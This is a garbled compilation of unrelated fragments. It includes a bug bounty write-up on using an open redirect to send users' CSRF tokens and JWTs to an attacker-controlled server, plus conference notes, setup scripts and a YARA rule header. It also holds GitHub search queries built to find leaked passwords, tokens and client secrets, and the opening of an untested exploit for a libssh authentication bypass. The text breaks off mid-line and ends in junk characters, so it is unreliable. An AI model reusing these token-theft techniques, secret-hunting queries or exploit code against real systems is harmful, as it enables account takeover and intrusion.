Damian Tykałowski d47zm3

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
User loads https://example.com/?code=VALUE
Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
```
GET /verify/VALUE HTTP/1.1
Host: example.com
```

Fast Testing Checklist

A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file

Devopsdays London 2017

initial session, bob walker (@rjw1)

welcome everyone!
we have a code of conduct
thanks to organisers, sponsors, etc

Humane Teams at home and around the world

	import openai
	import boto3
	import json
	import time
	from typing import Dict, List

	openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
	session = boto3.session.Session()
	client = session.client('iam')

	https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
	https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
	https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
	https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
	https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
	https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
	https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

	/*
	WARNING:

	the newest version of this rule is now hosted here:
	https://github.com/Neo23x0/god-mode-rules/blob/master/godmode.yar
	*/


	/*
	_____ __ __ ___ __

	#!/usr/bin/env python
	# vim: set fileencoding=utf-8
	#
	# USAGE:
	# Back up your tmux old config, run the script and redirect stdout to your conf
	# file. Example:
	#
	# $ cp ~/.tmux.conf ~/.tmux.conf.orig
	# $ python ./tmux-migrate-options.py ~/.tmux.conf.orig > ~/.tmux.conf
	#

	#!/bin/bash
	export DEBIAN_FRONTEND=noninteractive;
	echo "[] Starting Install... []"
	echo "[] Upgrade installed packages to latest []"
	echo -e "\nRunning a package upgrade...\n"
	apt-get -qq update && apt-get -qq dist-upgrade -y
	apt full-upgrade -y
	apt-get autoclean

	echo "[] Install stuff I use all the time []"

	#!/usr/bin/env python
	# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
	# untested CVE-2018-10933

	import sys, paramiko
	import logging

	username = sys.argv[1]
	hostname = sys.argv[2]
	command = sys.argv[3]

	`
	~/
	~
	×™×


	___
	__
	_
	---